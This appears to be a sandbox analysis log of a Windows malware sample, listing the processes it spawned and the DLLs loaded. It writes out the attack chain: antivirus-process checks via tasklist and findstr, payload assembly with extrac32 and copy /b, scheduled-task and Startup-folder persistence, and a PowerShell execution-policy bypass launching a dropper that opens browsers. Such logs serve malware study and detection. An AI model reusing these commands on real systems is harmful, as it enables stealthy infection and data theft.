Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 353090
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Really.pub
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "posted" Good
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 353090\Seat.com + Pf + Somewhere + Volumes + Commission + Lane + Hit + Strong + Copied + Wearing + Acquire 353090\Seat.com
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Maintains.pub + ..\Legislation.pub + ..\Blood.pub + ..\Document.pub + ..\Breaks.pub + ..\Both.pub + ..\Explicitly.pub + ..\Governor.pub + ..\Bull.pub + ..\Comparison.pub + ..\Performing.pub + ..\Gate.pub + ..\Republican.pub + ..\Reverse.pub + ..\Thousand.pub + ..\Apartments.pub + ..\Swingers.pub + ..\Urban.pub + ..\Robert.pub + ..\Regulation.pub + ..\Confusion.pub + ..\Listening.pub + ..\Generating.pub + ..\Argentina.pub + ..\Amenities.pub + ..\Vacation.pub + ..\Vampire.pub + ..\Trademarks.pub + ..\Distinguished.pub + ..\Silly.pub + ..\Hell.pub + ..\Worcester.pub + ..\Concept.pub + ..\Enlarge.pub + ..\Preference.pub + ..\Poem.pub m
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\353090\Seat.com Seat.com m
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url" & echo URL="C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url" & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com" "C:\Users\user\AppData\Local\TradeSecure Innovations\F"
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com" "C:\Users\user\AppData\Local\TradeSecure Innovations\F"
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Process created: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\curcuma.exe"' & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\curcuma.exe"'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\curcuma.exe "C:\Users\user\AppData\Local\Temp\curcuma.exe"
Source: C:\Users\user\AppData\Local\Temp\curcuma.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1936,i,5305006061332576876,17319552954880503810,262144 --variations-seed-version --mojo-platform-channel-handle=2236 /prefetch:3
Source: C:\Users\user\AppData\Local\Temp\curcuma.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory="Default"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2300 --field-trial-handle=2096,i,2842194220783237697,10925811508381354400,262144 /prefetch:3
Source: unknown Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2752 --field-trial-handle=2228,i,3676741929503588112,17871370342743510954,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6732 --field-trial-handle=2228,i,3676741929503588112,17871370342743510954,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6988 --field-trial-handle=2228,i,3676741929503588112,17871370342743510954,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7396 --field-trial-handle=2228,i,3676741929503588112,17871370342743510954,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7396 --field-trial-handle=2228,i,3676741929503588112,17871370342743510954,262144 /prefetch:8
Source: C:\Users\user\Desktop\ADFoyxP.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c expand Go.pub Go.pub.bat & Go.pub.bat
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\expand.exe expand Go.pub Go.pub.bat
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 353090
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Really.pub
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "posted" Good
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 353090\Seat.com + Pf + Somewhere + Volumes + Commission + Lane + Hit + Strong + Copied + Wearing + Acquire 353090\Seat.com
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Maintains.pub + ..\Legislation.pub + ..\Blood.pub + ..\Document.pub + ..\Breaks.pub + ..\Both.pub + ..\Explicitly.pub + ..\Governor.pub + ..\Bull.pub + ..\Comparison.pub + ..\Performing.pub + ..\Gate.pub + ..\Republican.pub + ..\Reverse.pub + ..\Thousand.pub + ..\Apartments.pub + ..\Swingers.pub + ..\Urban.pub + ..\Robert.pub + ..\Regulation.pub + ..\Confusion.pub + ..\Listening.pub + ..\Generating.pub + ..\Argentina.pub + ..\Amenities.pub + ..\Vacation.pub + ..\Vampire.pub + ..\Trademarks.pub + ..\Distinguished.pub + ..\Silly.pub + ..\Hell.pub + ..\Worcester.pub + ..\Concept.pub + ..\Enlarge.pub + ..\Preference.pub + ..\Poem.pub m
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\353090\Seat.com Seat.com m
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url" & echo URL="C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url" & exit
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Process created: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com" "C:\Users\user\AppData\Local\TradeSecure Innovations\F"
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com" "C:\Users\user\AppData\Local\TradeSecure Innovations\F"
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\curcuma.exe"' & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\curcuma.exe"'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\curcuma.exe "C:\Users\user\AppData\Local\Temp\curcuma.exe"
Source: C:\Users\user\AppData\Local\Temp\curcuma.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe"
Source: C:\Users\user\AppData\Local\Temp\curcuma.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1936,i,5305006061332576876,17319552954880503810,262144 --variations-seed-version --mojo-platform-channel-handle=2236 /prefetch:3
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2300 --field-trial-handle=2096,i,2842194220783237697,10925811508381354400,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2300 --field-trial-handle=2096,i,2842194220783237697,10925811508381354400,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2752 --field-trial-handle=2228,i,3676741929503588112,17871370342743510954,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6732 --field-trial-handle=2228,i,3676741929503588112,17871370342743510954,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6988 --field-trial-handle=2228,i,3676741929503588112,17871370342743510954,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7396 --field-trial-handle=2228,i,3676741929503588112,17871370342743510954,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7396 --field-trial-handle=2228,i,3676741929503588112,17871370342743510954,262144 /prefetch:8
Source: C:\Users\user\Desktop\ADFoyxP.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\ADFoyxP.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\ADFoyxP.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\ADFoyxP.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\ADFoyxP.exe Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\ADFoyxP.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\ADFoyxP.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\ADFoyxP.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\ADFoyxP.exe Section loaded: riched20.dll
Source: C:\Users\user\Desktop\ADFoyxP.exe Section loaded: usp10.dll
Source: C:\Users\user\Desktop\ADFoyxP.exe Section loaded: msls31.dll
Source: C:\Users\user\Desktop\ADFoyxP.exe Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\ADFoyxP.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\ADFoyxP.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\ADFoyxP.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\ADFoyxP.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\ADFoyxP.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\ADFoyxP.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\ADFoyxP.exe Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\ADFoyxP.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\ADFoyxP.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\ADFoyxP.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\ADFoyxP.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\ADFoyxP.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\ADFoyxP.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\ADFoyxP.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\ADFoyxP.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\ADFoyxP.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\ADFoyxP.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\ADFoyxP.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\ADFoyxP.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\ADFoyxP.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\ADFoyxP.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\ADFoyxP.exe Section loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\expand.exeSection loaded: cabinet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: version.dll
                  Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: mpr.dll
                  Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: framedynos.dll
                  Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: dbghelp.dll
                  Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: srvcli.dll
                  Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: netutils.dll
                  Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: wbemcomn.dll
                  Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: winsta.dll
                  Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: amsi.dll
                  Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: userenv.dll
                  Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: profapi.dll
                  Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: version.dll
                  Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: mpr.dll
                  Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: framedynos.dll
                  Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: dbghelp.dll
                  Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: srvcli.dll
                  Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: netutils.dll
                  Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: wbemcomn.dll
                  Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: winsta.dll
                  Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: amsi.dll
                  Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: userenv.dll
                  Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: profapi.dll
                  Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: cabinet.dll
                  Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: uxtheme.dll
                  Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: textinputframework.dll
                  Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: coreuicomponents.dll
                  Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: coremessaging.dll
                  Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: ntmarta.dll
                  Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: coremessaging.dll
                  Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: wintypes.dll
                  Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: wintypes.dll
                  Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: wintypes.dll
                  Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: textshaping.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Section loaded: wsock32.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Section loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Section loaded: winmm.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Section loaded: mpr.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Section loaded: wininet.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Section loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Section loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Section loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Section loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Section loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Section loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Section loaded: ntmarta.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Section loaded: napinsp.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Section loaded: pnrpnsp.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Section loaded: wshbth.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Section loaded: nlaapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Section loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Section loaded: dnsapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Section loaded: winrnr.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Section loaded: rasadhlp.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Section loaded: apphelp.dll
                  Source: C:\Windows\SysWOW64\choice.exe Section loaded: version.dll
                  Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
                  Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Section loaded: wsock32.dll
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Section loaded: version.dll
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Section loaded: winmm.dll
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Section loaded: mpr.dll
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Section loaded: wininet.dll
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Section loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Section loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Section loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Section loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Section loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Section loaded: wldp.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Section loaded: wsock32.dll
